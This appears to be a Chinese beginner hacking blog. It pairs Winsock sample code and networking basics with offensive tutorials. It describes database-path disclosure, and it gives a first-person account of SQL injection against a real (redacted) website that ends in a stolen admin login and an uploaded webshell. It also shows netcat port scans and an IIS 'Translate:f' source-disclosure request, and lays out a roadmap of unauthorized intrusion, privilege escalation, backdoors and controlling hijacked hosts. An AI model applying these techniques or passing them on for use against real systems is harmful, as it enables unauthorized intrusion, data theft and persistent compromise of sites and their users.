下面将完整的程序代码提供如下,大家可直接编译运行
首先看客户端的代码:
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
void main() {
// 初始化 Winsock.
WSADATA wsaData;
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR )
printf("Error at WSAStartup()/n");
// 建立socket socket.
SOCKET client;
client = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if ( client == INVALID_SOCKET ) {
printf( "Error at socket(): %ld/n", WSAGetLastError() );
WSACleanup();
return;
}
// 连接到服务器.
sockaddr_in clientService;
clientService.sin_family = AF_INET;
clientService.sin_addr.s_addr = inet_addr( "127.0.0.1" );
clientService.sin_port = htons( 27015 );
if ( connect( client, (SOCKADDR*) &clientService, sizeof(clientService) ) == SOCKET_ERROR) {
printf( "Failed to connect./n" );
WSACleanup();
return;
}
// 发送并接收数据.
int bytesSent;
int bytesRecv = SOCKET_ERROR;
char sendbuf[32] = "Client: Sending data.";
char recvbuf[32] = "";
bytesSent = send( client, sendbuf, strlen(sendbuf), 0 );
printf( "Bytes Sent: %ld/n", bytesSent );
while( bytesRecv == SOCKET_ERROR ) {
bytesRecv = recv( client, recvbuf, 32, 0 );
if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET ) {
printf( "Connection Closed./n");
break;
}
if (bytesRecv < 0)
return;
printf( "Bytes Recv: %ld/n", bytesRecv );
}
return;
}
下面是服务器端代码:
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
void main() {
// 初始化
WSADATA wsaData;
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR )
printf("Error at WSAStartup()/n");
// 建立socket
SOCKET server;
server = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if ( server == INVALID_SOCKET ) {
printf( "Error at socket(): %ld/n", WSAGetLastError() );
WSACleanup();
return;
}
// 绑定socket
sockaddr_in service;
service.sin_family = AF_INET;
service.sin_addr.s_addr = inet_addr( "127.0.0.1" );
service.sin_port = htons( 27015 );
if ( bind( server, (SOCKADDR*) &service, sizeof(service) ) == SOCKET_ERROR ) {
printf( "bind() failed./n" );
closesocket(server);
return;
}
// 监听 socket
if ( listen( server, 1 ) == SOCKET_ERROR )
printf( "Error listening on socket./n");
// 接受连接
SOCKET AcceptSocket;
printf( "Waiting for a client to connect.../n" );
while (1) {
AcceptSocket = SOCKET_ERROR;
while ( AcceptSocket == SOCKET_ERROR ) {
AcceptSocket = accept( server, NULL, NULL );
}
printf( "Client Connected./n");
server = AcceptSocket;
break;
}
// 发送接受数据
int bytesSent;
int bytesRecv = SOCKET_ERROR;
char sendbuf[32] = "Server: Sending Data.";
char recvbuf[32] = "";
bytesRecv = recv( server, recvbuf, 32, 0 );
printf( "Bytes Recv: %ld/n", bytesRecv );
bytesSent = send( server, sendbuf, strlen(sendbuf), 0 );
printf( "Bytes Sent: %ld/n", bytesSent );
return;
}
本程序仅仅描述了同步的情况!
2:02 |
添加评论
|
固定链接
|
引用通告 (0)
|
写入日志
黑客初级知识3
第三节 Windows 网络协议
首先介绍一下网络协议:网络协议是网络上所有设备之间通信规则的集合,他定义了通信时信息必须采用的格式和这些格式的意义.大多数
网络协议都采用分层体系结,每一层都建立在他的下层之上,向他的上一层提供服务,而把如何实现这一服务的细节对上层加以屏蔽.一台设备上
的第N层与另一台设备上的第N层进行通信的规则就是第N曾协议.在网络上的个层之间中存在着许多协议,接受方和发送方同层的协议必须一致,
否则,一方就无法识别另一方发出的信息.网络协议使网络上的设备各种设备能相互交换信息.
常用的协议有:TCP/IP协议,IPX/SPX歇息等等.在局域网中常用的IPX/SPX协议.而访问INTERNET,就必须添加TCP/IP协议.
TCP/IP协议是传输控制协议/互联网络协议.他规范了网络上所有设备的通信,尤其是一个主机与另一个主机之间的数据往来格式以及传送
方式.
在网络的各层中还存在着许多协议,下面列出部分网络协议规范:
ARP 地址解析协议
SNMP 网络管理协议
BOOTP 让无盘站从一个中心服务器上获得IP地址
DHCP 动态主机配置协议
下面介绍网络7层协议在WINDOWS的实现:
7层协议 WIN系统
________________________________________
7 应用层 7 应用程序
________________________________________________
6 表示层 6 WINSOCK API(DLL)
___________________________________________
5 会话层 5 SPI(DLL)
__________________________________________________
4 传输层 4 TDI(VXD,SYS)
___________________________________________________
3 网络层 3 NDIS(VXD,SYS)
__________________________________________________
2 数据链路层 2 网卡驱动程序(VXD,SYS)
___________________________________________
1 物理层 1 网卡
_________________________________________________
相信这个映射图可以让大家比较清楚了解他们的对应关系
TCP协议图示
应用程序协议 HTTP FTP TELNET
传输协议 TCP UDP
网际协议 IP
物理层协议 网卡
IP协议保证数据的传输,TCP协议保证数据传输的质量.
TCP/IP协议基于四层结构:应用层,传输层,网络层,接口层,数据在传输时每通过一层就要在数据上加个头,其中的数据供接受端同层使用,在
接收端,每经过一层就把头去掉,来保证传输数据格式的一致.
TCP头部结构:
16位源端口号 16位目的端口号
_______________________________________________________________________________
32位序列号
___________________________________________________________________________
32位确认号
_____________________________________________________________________________________
4位首部长度+6位保留字 6位标志 16位窗口大小
_______________________________________________________________________________________
16位效验和 16位紧急数据偏移量
_____________________________________________________________________________________
数据段
_______________________________________________________________________________
IP头部结构:
4位IP版本号 4位首部长度 8位服务类型 16位总长度
___________________________________________________________________________________________
16位标示 3位标志和偏移
__________________________________________________________________________
8位生存时间 8位协议 16位IP首部效验和
________________________________________________________________________________________________
32位源IP地址
_________________________________________________________________________________________________________
32位目的IP地址
________________________________________________________________________________________
TCP头和数据
2:01 |
添加评论
|
固定链接
|
引用通告 (0)
|
写入日志
黑客初级知识2
第二节 Win API编程简介
下面介绍一下WIN API.
我们需要自己编写一个工具时,必然会用到很多操作windows和控制windows的函数,这些函数就是windows API.
API是Application Progamming Interface的缩写.就是说API是一系列已经定义的在windows内部的函数,是应用程序和系统之间的
桥梁,应用程序通过调用API来请求系统完成一系列的任务.窗口,菜单,文件操作等都是通过API实现的.
WIN32 API就是WINDOWS 32位平台的应用程序接口.现在可视化编程工具提供了大量控件,他们代替了API的功能.这些控件都是构建
在WIN32 API之上的.是封装了的API函数集合.但是对于比较复杂和特殊功能(想我们的黑客编程)来说,就必须用API函数来实现.
WIN API存放在动态链接库(DLL)中,在98系统中,有32位的GDI32.DLL,KERNEL32.DLL,16位的GDI.EXE,KRNL386.EXE.API就存放在这些
动态链接库中.
木马和后门其实就是使用了文件操作函数,这里做简要介绍:
删除文件:BOOL DeleteFile(LPCTSH lpFileName)
复制文件:BOOL CopyFile()
移动文件:BOOL MoveFile()等等
具体的API可以上网自己去查看,有很多介绍API的书籍.
2:00 |
添加评论
|
固定链接
|
引用通告 (0)
|
写入日志
黑客初级知识1
第一节 了解Windows机制
Windows 是一个“基于事件的,消息驱动的”操作系统。
在Windows下执行一个程序,只要用户进行了影响窗口的动作(如改变窗口大小或移动、单击鼠标等)该动作就会触发一个相应的“事件”
系统每次检测到一个事件时,就会给程序发送一个“消息”,从而使程序可以处理该事件。
每个Windows 应用程序都是基于事件和消息的,而且包含一个主事件循环,它不停地、反复地检测是否有用户事件发生。每次检测到一个
用户事件,程序就对该事件做出响应,处理完再等待下一个事件的发生。
Windows 下的应用程序不断地重复这一过程,直至用户终止程序,用代码来描述实际上也就是一个消息处理过程的while循环语句。
下面便简单介绍一下与 Windows 系统密切相关的几个基本概念:
1:窗口:这是我要说的第一个概念。窗口是Windows本身以及Windows 环境下的应用程序的基本界面单位,但是很多人都误以为只有具有
标题栏、状态栏、最大化、最小化按钮这样标准的方框才叫窗口。其实窗口的概念很广,例如按钮和对话框等也是窗口,只不过是一种特殊化
窗口罢了。
从用户的角度看,窗口就是显示在屏幕上的一个矩形区域,其外观独立于应用程序,事实上它就是生成该窗口的应用程序与用户间的直观
接口;从应用程序的角度看,窗口是受其控制的一部分矩形屏幕区。应用程序生成并控制与窗口有关的一切内容,包括窗口的大小、风格、位
置以及窗口内显示的内容等。用户打开一个应用程序后,程序将创建一个窗口,并在那里默默地等待用户的要求。每当用户选择窗口中的选
项,程序即对此做出响应。
2:程序:通常说的程序都是指一个能让计算机识别的文件,接触得最多的便是.exe型的可执行文件.
3:进程:说到进程,学过《操作系统》的人都很清楚,所谓进程就是应用程序的执行实例(或称一个执行程序) 需要注意的是:进程是
程序动态的描述,而上面说到的程序是静态的描述,两者有本质的区别。举个例子,从网上 Down了一个瑞星杀毒软件到C盘但没有运行,那
个.exe 可执行文件叫做程序,它是一个二进制码的文件。一旦双击了exe文件图标运行程序,那个“正在运行着的瑞星杀毒”便称为进程,它
在双击的那一刻被系统创建,当你关机或者在任务栏的图标上单击鼠标右键选“退出”时,进程便消亡,彻底结束了生命。进程经历了由“创
建”到“消亡”的生命期,而程序自始至终存在于你的硬盘上,不管你的机器是否启动。
4:线程:线程是进程中的一个执行单元,同一个进程中的各个线程对应于一组CPU指令、一组CPU寄存器以及一堆栈。进程本来就具有动态
的含义,然而实质上是通过线程来执行体现的,从这个意义上说,Windows 中进程的动态性意义已经不是很明显了,只算是给程序所占的资源
划定一个范围而已,真正具有动态性意义的是线程。
5:消息:我们几乎做每一个动作都会产生一个消息,鼠标被移动会产生WM_MOUSEMOVE消息,鼠标左键被按下会产生WM_LBUTTONDOWN的消
息,鼠标右键按下便产生WM_RBUTTONDOWN消息等等。所有的这些都可以通过GetMessage,SendMessage等函数得到.
6:事件:如在程序运行的过程中改变窗口的大小或者移动窗口等,都会触发相应的“事件”。
7:句柄:单单一个“柄”字便可以解释它的意思了,我们天气热摇扇子的时候只要抓住扇柄便可以控制整个扇子的运动了,在程序中也
差不多是这个意思。通常一个句柄就可以传递我们所要做的事情。有经验的成员肯定清楚,编写程序总是要和各种句柄打交道的,句柄是
系统用来标识不同对象类型的工具,如窗口、菜单等,这些东西在系统中被视为不同类型的对象,用不同的句柄将他们区分开来。
C++ 教材中给句柄下的定义是:“在Win32里,句柄是指向一个无值型对象(void *)的指针,是一个4字节长的数据”。从结构
上看,句柄的确是一个指针,尽管它没有指向用于存储某个对象的内存位置,而实际上句柄指向的是一个包含了对该对象进行的引用的位置。
在编程时,只要抓住了对象的句柄就可以对该对象进行操作了.
8:API与SDK:API是英文 Application Programming Interface 的简称,意为“应用程序接口”,泛指系统为应用程序提供的一系列接
口函数。其实质是程序内的一套函数调用,在编程的时候可以直接调用,而不必知道其内部实现的过程,只知道它的原型和返回值就可以
了.
SDK是英文 Software Development Kit 的缩写,指“软件开发工具包”,在防火墙的设计中就经常涉及到SDK。
1:59 |
添加评论
|
固定链接
|
引用通告 (0)
|
写入日志
《绝对暴库》 没有在网站发表的
随着前三篇文章的诞生,大家想必对黑客有了一定的了解了吧,今天就来讲下以前的一个漏洞,但是很经典,现在也有不少网站仍然存在这样的漏洞。就是暴库漏洞。
什么是暴库呢?就是利用不正当的手段使对方把数据库的绝对路经显示出来,然后我门知道了绝对路径,就可以下载下来,这样这个网站的数据库中的资料就被我门轻松掌握了。
那么怎么样使用暴库呢?这个在新人2中有介绍,今天就来说说具体的用法。首先要知道怎样才能暴库呢?那就是把网站的第一个/换成\,如果有漏洞就可以直接显示出数据库的绝对路径了,我们把绝对路径中数据库的部分写到网站后面就可以下载数据库了。还有一种方法,就是填写默认的数据库路径,就是conn.asp这样的默认数据库路径,每种形式的论坛,都有自己默认的数据库默认路径,大家去网上随便找找就可以找到了。但是在这个conn.asp默认路径的前面也是要把/换成\的。
为什么暴出来的数据库后缀名是.asp形式的?这个是经过修改的,可能做了防下载处理,大家还是先把默认的路径添上以后看显示什么,如果没有做过防下载处理,会显示一堆乱码,大家可以把地址复制下来用讯雷下载下来,把.asp换成.mdb就可以打开了。
为什么我暴出来数据库路径,也添入了正确的路径下载不下来啊?数据库路径是这样的D:/web/abc/#sjgf.mdb。这个是因为其中有个#在作怪,在ASCII中#相当与00 ,终止的意思,这里大家可以把这个#换成#就可以下载了。
为什么我暴出了数据库,地址什么都写对着呢,还是下不了啊?那么可能是因为数据库做了防下载处理,所以下载不下来。
为什么下载下来的数据库要求输入密码呢?是因为数据库进行了加密,破解很简单,明小子的DOMIAN就有破解功能。
得到数据库有什么用呢?用处大了,比如是个论坛的数据库,里面就记录了所有论坛里的信息,而我们需要的大概是ADMIN的信息吧?呵呵,还=什么呢啊?快去打开数据库中admin的啊,看下ADMIN的用户名,然后在user里把ADMIN的ID找出来,然后就可以以他的身份登陆论坛了哦!
1:57 |
添加评论
|
固定链接
|
引用通告 (0)
|
写入日志
进后台还可以这样玩
今天无意间碰到了个网站。。还比较大。。不把 真实的网址发出来了。。。。就算给偶等小菜练手吧。。。。随便找了个页面http://www.***.com/newsshow.asp?id=808 asp的 看来是有搞头了。。。在后面加了 and 1=1 返回 正常了。。。。 and 1=2ADODB.Field 错误 '80020009' BOF 或 EOF 中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 /newsshow.asp,行0 确定有注入漏洞。。。。提交http://www.****/newsshow.asp?id=808 and (select count(*) from sysobjects)>0 Microsoft JET Database Engine 错误 '80040e37' Microsoft Jet 数据库引擎找不到输入表或查询 'sysobjects'。 确定它是否存在,以及它的名称的拼写是否正确。 /newsshow.asp,行84 倒。。。看来是access 数据库了。。。。那就拿去NB 来跑吧。。顺便拿去明小子的那个旁注扫后台地址 鄙人都喜欢这样做的。。西西 一举两得嘛一回儿。。后台路径是出来了http://www.**i.com/../admin.asp可NB里面总是不出来。。郁闷。。汗。。估计表名被管理员改的太BT了。。猜都猜不到。。。手工试了几个从站面上拿来的。。也全不是。。郁闷中。。后来发现了个论坛。。go go go 骑着偶的乌龟去了。。。是动网的 不过被管理员改的面目全非了。。。连一先在线情况,,用户名都不能看见。。。总共有多少的注册用户都不给你看。。汗。。真够小气的哦。。咱们还是忙咱们的 不管他。。哈哈。。随便注册了个用户。。在个人资料里试试上传了(台下的 仍鸡蛋了。。都NNN年的漏洞了怎么可能还有,。,,)也不能这么说啊。。。有想法当然要去实践了嘛。。西西随便选张图片看看 上传的功能还在不在。。哈哈。文件格式不正确 [ 重新上传 ] ???? 我选的是图片耶 不是马啊。。怎么不正确?然后试了下马 也一样。。估计是什么都不可以上传。。BT 在去发张帖子看看。。那里也有上传的Server.MapPath() 错误 'ASP 0174 : 80004005' 无效路径字符 /bbs/post_upfile.asp,行125 MapPath 方法的路径参数中有无效字符 '/' 或 '/'。郁闷了。。。怎么搞的。。连这个都不放过。。汗。。决。。现在想想还有什么办法没试。。。。对了。。默认的数据库。。顺手在bbs/后面加了data/dvbbs7.mdb 哈哈 提示下载。。HOHO~~~这么爽。。。5M多。。一分钟就完了 (因为偶的网速慢啊)找到DV-LOG 在字段跟关键字里分别选择L-content 跟pass接下来不用我说吧。。找到管理员帐号跟密码就行了哈。。。顺利的登陆进去。。。接下来当然是传马了 得到个webshell在说。。。。一时想起来了。。。连上传页面都没了。。还怎么得webshell?备份功能不行了啊。。怎么办。。。郁闷中。。。后来在群里叫了浩南。叫他帮我看下。。十几分种后。。他给了我webshell 西西。。感谢中。。不过咱们要知道的是方法。。所以就缠着他问他了。。。他跟我来了个远程协助。。。偶是看着他做的。。。(下面我就引用他的话了,仔细看了哦。。西西)原来在登陆后台后。。里面有个系统设置。。有个 UploadFile/上传目录是这个 按说UploadFile/应该没错的 论坛的所有的都是传在UploadFile/目录下 现在我们也放在这个目录下。不是没有权限而是这个目录 也许你发现不了什么 UploadFile/如果上传成功的话。这个目录就变成了UploadFile//这个目录而计算机里根本就没有UploadFile/文件夹 只有UploadFile文件夹 我们来修改一下也就是把UploadFile/ 后面的斜杆去掉。。。变成UploadFile 现在我去前台来上传 发表话题。。随便选个文件。。。1个文件上传成功,目前今天总共上传了1个附件 [ 继续上传 ] 西西 现在不是变成可以上传了吗??OK。。。。现在上传图片。到后台备份。。。成功 得到webshell不过你要把他的设置给改回来的哦。。。。在次感谢浩南的无私帮助。thank you very much ^_^ (数据库是MDB 的是否能利用数据库插马的方法来得webshell请大虾指点)
1:54 |
添加评论
|
固定链接
|
引用通告 (0)
|
写入日志
NC的使用
了解NC的用法
命令:nc –h
技巧:win98用户可以在autoexec.bat加入
path=nc的路径,win2000用户在环境变量中加入path中,linux含有这个命令(redhat)
1、基本使用
想要连接到某处: nc [-options] hostname port[s] [ports] ...
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
参数:
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u UDP模式
-v 详细输出——用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉——用于扫描时
其中端口号可以指定一个或者用lo-hi式的指定范围。
例如:扫描端口
tcp扫描
C:/nc>nc -v -z -w2 192.168.0.80 1-140
net [192.168.0.80] 140 (?)
net [192.168.0.80] 139 (netbios-ssn) open
net [192.168.0.80] 138 (?)
net [192.168.0.80] 137 (netbios-ns)
net [192.168.0.80] 136 (?)
net [192.168.0.80] 135 (epmap) open
net [192.168.0.80] 81 (?) open
net [192.168.0.80] 80 (http) open
net [192.168.0.80] 79 (finger)
net [192.168.0.80] 25 (smtp) open
net [192.168.0.80] 24 (?)
net [192.168.0.80] 23 (telnet)
net [192.168.0.80] 21 (ftp)
udp扫描
C:/nc>nc -u -v -z -w2 192.168.0.80 1-140
net [192.168.0.80] 140 (?) open
net [192.168.0.80] 139 (?) open
net [192.168.0.80] 138 (netbios-dgm) open
net [192.168.0.80] 137 (netbios-ns) open
net [192.168.0.80] 54 (?) open
net [192.168.0.80] 53 (domain) open
net [192.168.0.80] 38 (?) open
net [192.168.0.80] 37 (time) open
net [192.168.0.80] 7 (echo) open
二、高级应用
1.Window用法:
(1)IE的MIME欺骗
www.try2hack..nl(是一个让初学黑客技术的人去做实验的站点)
打开这个页面,有个
http://www.try2hack.nl/cgi-bin/level7.pl页面(这个网站提供了黑客的8关,过了这8关证明你开始入门了),这个页面告诉我们的浏览器不是 IE6.72,我们的操作系统不是LIUNX,我们不是从www.microsoft.com/ms.htm重定向链接过去的,有病阿(这是一个题目呀,要慢慢研究),linux有IE6.72? 微软会在它的页面上放上
http://www.try2hack.nl/cgi-bin/level7.pl的链接?看看页面的源代码,level7.pl是在服务器端 执行的perl脚本,根本无法看到,还是研究一下IE5和它通信时都告诉了它什么,抓包,我们会发现,我们的IE5告诉对方: 我是MSIE 5.0; Windows NT 5.0; .NET CLR 1.0.3705。。。。哈哈,level7.pl这个cgi应该是根据这些信息知道我们不是它要求的 客户,嘿嘿,需要欺骗对方才行,用军刀来可以实现,如下做就可以哄对方了:
nc www.try2hack.nl 80 [enter]
GET /cgi-bin/level7.pl HTTP/1.1 [enter]
Accept: image/gif, image/x-xbitmap, application/msword, */* [enter]
Referer:
http://www.microsoft.com/ms.htm [enter]
Accept-Language: zh-cn [enter]
Accept-Encoding: gzip, deflate [enter]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.72; Linux 8.8.8 i986) [enter]
Host: www.try2hack.nl [enter]
Connection:
Keep-Alive [enter]
注意,如果出现HTTP 400时,说明你输入格式有问题,出现httpd 200回应时,就给出结果了:
哈哈!赶快去实现一下(实践是成功之母)
(2)IIS 5 “Translate:f” 显示代码脆弱点
Translate:f脆弱点的机制:发送一个畸形的HTTP GET 请求给服务器方一个可执行脚本或相关文件类型(例如.ASP或者global.asa)。这些文件是用于服务器上运行的,绝不会到客户机上去,而这个请求就会导致IIS将这种文件的内容发送到远端的客户机上,而不是在服务器上运行。这种畸形的HTTP GET请求的关键特性是该请求的末尾有一个特定的头信息Translate:f,并有一个反斜杠”/”附于URL之后。下面就有这样的一个例子([CRLF]代表回车字符)
注意 GET global.asa 后的反斜杠以及Translate:f头信息。
GET /global.asa/ HTTP/1.0
Host:192.168.0.1
User-Agent:SensePostData
Content-Type:application/x-www-form-urlencoded
Translate:f
[CRLF]
[CRLF]
将以上内容保存在一个文本文件中(例如example.txt)
然后向一个有这个漏洞的服务器发送
c:/>type example.txt | nc –nvv 192.168.0.80 80
(UNKNOWN) [192.168.0.80] 80 (?) open
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 Dec 2002 08:50:46 GMT
Content-Type: application/octet-stream
Content-Length: 2790
ETag: “0448299fcd6df1:bea”
Last-Modified: Wed, 13 Nov 2002 18:50:46 GMT
Accept-Ranges: bytes
Cache-Control: no-cache
1:48 |
添加评论
|
固定链接
|
引用通告 (0)
|
写入日志
|
收藏
9月3日
菜鸟变黑客高手(整理版)绝对对你有用
第一章------关于找软件
常用类软件:
黑白屋:
http://www.play8.net/
华军软件
http://www.newhua.com/ (根据物理位置自行选择速度快的镜像)
中国下载
http://download.com.cn/ (使用查找功能可找到大部份软件)
东丽在线
http://www.tjdl.net/softdown/ (不错的软件下载站,类似华军)
世纪下载
http://www.21sx.com/ (也是一个不错的下载站)
安全类软件:
黑白屋:
http://www.play8.net/index2.htm
安全焦点
http://www.xfocus.net/tool.php
安全资讯
http://www.aurorasafe.com/list.asp
天天安全
http://www.ttian.net/download/list.php
网嗅下载
http://netsill.com/download/default.asp
灰色轨迹
http://www.sandflee.net/down/list.asp
鹰派下载
http://211.155.27.112/~technic/down/
(一些大型精典安全软件下载,不过有时候就上不去)
找代理在这里:
代理使用方法
http://extend.hk.hi.cn/~sunbird/freeproxy_why.html
(各种代理使用方法介绍)
代理服务器地址
http://www.salala.com/proxy_index.htm
(每日更新的,大部份是HTTP代理)
代理服务器地址
http://www.emaga.net/8341/myann
(每日更新的,大部份是SOCKS代理,既QQ代理)
注册码在这里:
第六空间
http://www.sixthroom.com/down/qt/ser.rar (注册码大全下载)
注册码搜索
http://www.netpaste.com/code/
孤月注册码
http://www.guyue.com/key/
第二章------关于被入侵
简单说明:
经常有帖子说:“我中木马啦,怎么办?”、“我被攻击了”,“我的windows有问题,是不是被入侵啦?”等等。哪么如果你怀疑系统被入侵的话,请你首先看看日志的记录或是有什么变化,然后你应该查看可疑进程(win98需要用相关工具)、注册表启动项、服务、开放端口等,然后更新病毒库,杀毒。前提是你要有一定的电脑常识并对你的系统比较了解,才能分别正常与否。如果你自己对电脑一窍不通,那在论坛别人也很难帮助你。其实就像对付现实中的病毒一样,应该预防为主。杀毒软件和网络防火墙可以抵御绝大部分危险,自身安全知识的提高则是最根本的保障。最新的病毒相关知识可以到杀毒软件公司的主页上找。另外,系统不正常也可能是操作失误引起的。这里不是“电脑零起点”,所以关于系统修复的问题,请不要在论坛提了。
相关工具:
Active Ports 监视自己电脑的端口,并做出相应处理。
http://www.sixthroom.com/down/aq/cn_aports.rar
windows优化大师5.1 它的进程管理功能不错。更是目前最好的系统优化软件。
http://www.sixthroom.com/down/aq/wom.rar
Windows 基准安全分析器 1.0 (特别推荐,详细资料看下载说明吧)
http://www.sixthroom.com/down/admin/aq/mbsasetup.msi
Fport-2.0 查看端口关联的进程 (应用于9x/me)
http://www.sixthroom.com/down/admin/aq/fport.zip
mport 比fport更胜一筹的工具
http://www.sixthroom.com/down/admin/aq/mport.zip
KV3000江民杀毒王(正式版+钥匙盘)
http://www.kxweb.net/down/down.asp?downid=1&id=14
金山毒霸2003正式版
http://www.kxweb.net/down/down.asp?downid=1&id=11
相关资料:
黑白屋文档中心:
http://www.play8.net/cgi-bin/news/article/list.cgi
104种木马的清除方法
http://asp2.6to23.com/ebug88/net/article/net004.htm
清除恶意网页的破坏
http://assistant.3721.com/safe.htm
2000系统进程总列表
http://sinbad.zhoubin.com/read.html?board=Win&num=73
木马的检测、清除及其预防 天网安全检测
http://sky.net.cn/main/view.php?cid=170
蓝盾安全检测
http://www.bluedon.com/bluedonserver.asp
第三章------基础知识和入侵步骤
简单说明:
电脑和网络知识可算是做黑客的基础的基础,至少你要先了解了它们再来看下面的文章。看完这部分的文章,你也只是算站到了门口,路还长着呢。这里我再多说几句关于入侵步骤的话,给新手做个引导。所谓入侵,可以理解为未授权的访问。既然是未授权的,就需要借助一些非常规的手段,即通常所说的利用漏洞。
基础知识网址:
http://tech.163.com/tm/010213/010213_14563.html
http://tech.163.com/tm/010213/010213_14564.html
http://tech.163.com/tm/010214/010214_14632.html
http://tech.163.com/tm/010214/010214_14634.html
http://tech.163.com/tm/010214/010214_14638.html
一、要利用漏洞首先要发现它。端口扫描和漏洞扫描就是“敲门砖”。可以对大量目标做一般扫描,也可以对单一目标做重点扫描。或者两者结合。当你对漏洞熟悉时,你可以只通过端口扫描就能了解目标的可能有的漏洞。这样既提高效率又不易被记录日志。
几种扫描器的简单使用教程:
http://www.chinesehack.org/file/show.asp?id=5614
入侵技术介绍--目标探测:
http://www.sixthroom.com/ailan/f ... 2&RootID=279&ID=279
二、找到漏洞后的利用问题,是千差万别的。这正是新手学要学习的地方之一。很多要依靠自己的知识积累及对系统的掌握及熟悉程度,这里就不多说了。 下面提供几个提供漏洞资料的网站供大家参考。
天极网
http://www.myhard.com/76284138209935360/index.shtml
绿盟科技
http://www.nsfocus.net/index.php?act=sec_bug
五月安全网
http://bgbbs.www70.cn4e.com/article.asp?cat_id=2
中国信息安全
http://www.chinafirst.org.cn/ruodian/advisory.php
三、利用漏洞的目的是什么呢?是控制对方,即是获得远程shell。shell这个概念是从UNIX下继承过来的,是指与操作系统核心的一种交互方式和界面。典型的例子是telnet。得到shell的办法有很多种,比如通过系统自带的telnet,终端服务。或者用木马和工具提供的,如winshell,冰河等等。以下介绍两篇SHELL编程的文章给大家。
中国软件
http://www.csdn.net/develop/article/14/14219.shtm
程序春秋
http://www.cbinews.com/developer/showcontent.php?articleid=2193
四、shell是有权限差别的。最高权限--管理员权限才是我们的目标。所以有时会有提升权限的问题。当然,这也是利用了漏洞。以下介绍几篇文章。
Win2K 提升权限漏洞
http://www.yesky.com/20010530/182273.shtml
Microsoft SQL Server Webtasks权限提升漏洞
http://it.rising.com.cn/newSite/ ... 10/31-153502052.htm
Linux kernel ptrace提升权限漏洞
http://levinstorm.myetang.com/main/holes/unix/005.html
NT/2000提升权限的方法小结
http://home.lufeng.net/wolf/Computer/luodong/2000tisheng.htm
IIS提升权限漏洞
http://www.ddhome.net/hole/14.htm
五、有了shell还要扩大它,就是进一步获得更好用的shell。命令行的到图形的、功能少的到多的。于是才有了“怎么开3389”,“怎么上传”之类问题。在这介绍给大家介绍一下现在最流行的3389吧。更多的文章请
www.sixthroom.com。
远程开启3389终端服务
http://www.sandflee.net/wawa/3389-1.htm
建立你的3389肉鸡
http://www.sandflee.net/wawa/sz-3389.htm
六、为了下次还能控制目标,你需要保持shell。做一个好的后门又是一种“学问”。克隆帐号、埋木马、破administrator的密码,手段不一而足。各位慢慢学吧。
永远的后门
http://www.ttian.net/article/show.php?id=259
Win2000 下Ping 后门的简单实现
http://www.landun.org/wenzhang/images/xiaoran/article/154.html
帐号克隆
http://www.netXeyes.org/CA.exe
帐号检查
http://www.netXeyes.org/CCA.exe
暴力破解LC4
http://www.andyxu.net/banana/tools_2/lc4.rar
端口知识介绍:
相关工具:
扫描端口是扫描器的基本功能,工具太多了。提供两个给大家,更多的参看后面。
X-Port.zip下载
http://www.xfocus.net/download.php?id=327
PortReady下载
http://dotpot.533.net/dpsoft/PortReady1.6.zip
相关资料:
端口扫描简介
http://www.netscreen.com.cn/suml/zhishiyy/jingong/duankougj.htm0
系统服务及木马默认端口表
http://www.pttc.yn.cninfo.net/dtsy/nettech/netanquan/41250634.htm
端口大全
http://www.sixthroom.com/ailan/f ... 2&RootID=268&ID=268
常用默认端口列表及功能中文注解
http://www.sixthroom.com/ailan/f ... 2&RootID=267&ID=267
常见端口详解及部分攻击策略
http://www.sixthroom.com/ailan/f ... 2&RootID=266&ID=266
相关资料:
如何成为一名黑客
http://263.aka.org.cn/Docs/hacker-howto_2001.html
提问的技巧
http://bbs.online.sh.cn/eliteart ... 44fb3b6efa4377e48ae
TCP/IP基础
http://www.linkwan.com/gb/routertech/netbase/tcpip.htm
网络攻防教程
http://www.netsill.com/wenzhang/list.asp?id=115
网络入侵步骤及思路
http://www.iamguo.com/bh3/hackguide2.htm
拒绝背后黑手的窥探 IPC$漏洞大揭秘
http://computer.szptt.net.cn/2002-04-27/nw2002042700109.shtml
全球ip分配表
http://519519.vicp.net/lb5000//usr/3/3_11.txt
黑客入门教程
http://www.pttc.yn.cninfo.net/dtsy/nettech/netanquan/43934529.htm
菜鸟XXX客快速入门
http://netsafe.ayinfo.ha.cn/sqxw/2002117172333.htm
几种流行的入侵工具与讲解
http://www.pttc.yn.cninfo.net/dtsy/nettech/netanquan/44188520.htm
常见端口详解及部分攻击策略
http://www.pttc.yn.cninfo.net/dtsy/nettech/netanquan/-90637.htm
攻击的各种级别
http://www.pttc.yn.cninfo.net/dtsy/nettech/netanquan/39825935.htm
第四章------关于命令的使用
简单说明:
windowsNT/2000下有丰富的cmd可供使用,其作用也是巨大的。完全值得去熟练掌握她它们。windows2000本身就提供了详细的命令帮助。在开始菜单--》帮助中可以搜索到“windows 2000 命令参考”。强烈建议各位新手花些时间仔细看一遍。装了比如IIS等软件,就会有新的命令(iisreset),在命令行方式下加/?或-h参数可以查看帮助,其他内置的命令当然也可以。还有就是掌握一些常用的DOS命令也是非常有必要的。因为WINSOWS不管发展到哪一天,它也都不可能取代DOS,至少现在还不行。NET命令更是最常用的网络命令,想做一个黑客,更是你所必需掌握的。掌握一些LINUX命令也是很有必要的。希望下面的资料对大家有所帮助。
相关帖子:
DOS下常用网络相关命令解释
http://www.jiejingwang.com/list.asp?id=521
入门网络命令
http://www.jiejingwang.com/list.asp?id=520
Win2000命令全集
